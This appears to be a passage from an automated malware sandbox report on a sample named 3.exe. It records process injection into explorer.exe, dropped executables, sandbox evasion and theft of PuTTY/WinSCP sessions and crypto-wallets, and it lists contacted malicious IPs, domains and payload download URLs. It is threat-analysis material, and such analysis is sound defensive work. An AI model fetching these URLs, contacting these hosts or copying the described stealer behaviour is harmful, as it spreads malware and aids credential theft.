Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70C40 sqlite3_bind_zeroblob, 9_2_6CD70C40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70D60 sqlite3_bind_parameter_name, 9_2_6CD70D60
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC98EA0 sqlite3_clear_bindings, 9_2_6CC98EA0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 9_2_6CD70B40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC96410 bind,WSAGetLastError, 9_2_6CC96410
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC960B0 listen,WSAGetLastError, 9_2_6CC960B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 9_2_6CC9C050
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC96070 PR_Listen, 9_2_6CC96070
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9C030 sqlite3_bind_parameter_count, 9_2_6CC9C030
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC222D0 sqlite3_bind_blob, 9_2_6CC222D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC963C0 PR_Bind, 9_2_6CC963C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447653 Sample: 3.exe Startdate: 26/05/2024 Architecture: WINDOWS Score: 100 65 whispedwoodmoodsksl.shop 2->65 67 steamcommunity.com 2->67 69 dbfhns.in 2->69 87 Snort IDS alert for network traffic 2->87 89 Multi AV Scanner detection for domain / URL 2->89 91 Found malware configuration 2->91 93 16 other signatures 2->93 11 3.exe 2->11         started        14 rcjjrra 2->14         started        signatures3 process4 signatures5 111 Detected unpacking (changes PE section rights) 11->111 113 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->113 115 Maps a DLL or memory area into another process 11->115 125 2 other signatures 11->125 16 explorer.exe 87 7 11->16 injected 117 Antivirus detection for dropped file 14->117 119 Multi AV Scanner detection for dropped file 14->119 121 Machine Learning detection for dropped file 14->121 123 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->123 process6 dnsIp7 59 88.225.215.104, 49778, 49779, 49780 TTNETTR Turkey 16->59 61 23.145.40.124, 49725, 80 SURFAIRWIRELESS-IN-01US Reserved 16->61 63 3 other IPs or domains 16->63 41 C:\Users\user\AppData\Roaming\rcjjrra, PE32 16->41 dropped 43 C:\Users\user\AppData\Local\Temp\A247.exe, PE32 16->43 dropped 45 C:\Users\user\AppData\Local\Temp\5358.exe, PE32 16->45 dropped 47 C:\Users\user\...\rcjjrra:Zone.Identifier, ASCII 16->47 dropped 79 System process connects to network (likely due to code injection or exploit) 16->79 81 Benign windows process drops PE files 16->81 83 Deletes itself after installation 16->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->85 21 5358.exe 1 16->21         started        25 A247.exe 16->25         started        file8 signatures9 process10 dnsIp11 49 C:\Users\user\AppData\Local\...\kat2225.tmp, PE32 21->49 dropped 95 Machine Learning detection for dropped file 21->95 97 Contains functionality to inject code into remote processes 21->97 99 Writes to foreign memory regions 21->99 107 3 other signatures 21->107 28 kat2225.tmp 1 46 21->28         started        71 whispedwoodmoodsksl.shop 188.114.96.3, 443, 49719, 49721 CLOUDFLARENETUS European Union 25->71 73 185.235.137.54, 49729, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 25->73 101 Antivirus detection for dropped file 25->101 103 Multi AV Scanner detection for dropped file 25->103 105 Detected unpacking (changes PE section rights) 25->105 109 5 other signatures 25->109 33 WerFault.exe 21 25->33         started        file12 signatures13 process14 dnsIp15 75 steamcommunity.com 23.67.133.187, 443, 49735 AKAMAI-ASN1EU United States 28->75 77 65.109.242.59, 443, 49737, 49739 ALABANZA-BALTUS United States 28->77 51 C:\Users\user\AppData\...\softokn3[1].dll, PE32 28->51 dropped 53 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 28->53 dropped 55 C:\Users\user\AppData\...\mozglue[1].dll, PE32 28->55 dropped 57 10 other files (6 malicious) 28->57 dropped 127 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 28->127 129 Found many strings related to Crypto-Wallets (likely being stolen) 28->129 131 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->131 133 5 other signatures 28->133 35 cmd.exe 28->35         started        file16 signatures17 process18 process19 37 conhost.exe 35->37         started        39 timeout.exe 35->39         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
23.145.40.124
 unknown Reserved
22631 SURFAIRWIRELESS-IN-01US true
190.187.52.42
 dbfhns.in Peru
19180 AMERICATELPERUSAPE true
23.67.133.187
 steamcommunity.com United States
20940 AKAMAI-ASN1EU true
88.225.215.104
 unknown Turkey
9121 TTNETTR true
188.114.96.3
 whispedwoodmoodsksl.shop European Union
13335 CLOUDFLARENETUS true
185.235.137.54
 unknown Iran (ISLAMIC Republic Of)
202391 AFRARASAIR false
65.109.242.59
 unknown United States
11022 ALABANZA-BALTUS false
91.202.233.231
 unknown Russian Federation
9009 M247GB true
45.129.96.86
 unknown Estonia
208440 GMHOST-EE true

Contacted Domains

Name IP Active
whispedwoodmoodsksl.shop 188.114.96.3 true
steamcommunity.com 23.67.133.187 true
dbfhns.in 190.187.52.42 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
whispedwoodmoodsksl.shop true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://guteyr.cc/tmp/index.php true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/nss3.dll false
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/freebl3.dll false
  • Avira URL Cloud: safe
 unknown
http://45.129.96.86/file/update.exe true
  • 20%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://steamcommunity.com/profiles/76561199689717899 true
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/mozglue.dll false
  • Avira URL Cloud: safe
 unknown
https://65.109.242.59/vcruntime140.dll false
  • Avira URL Cloud: safe
 unknown
holicisticscrarws.shop true
  • Avira URL Cloud: malware
 unknown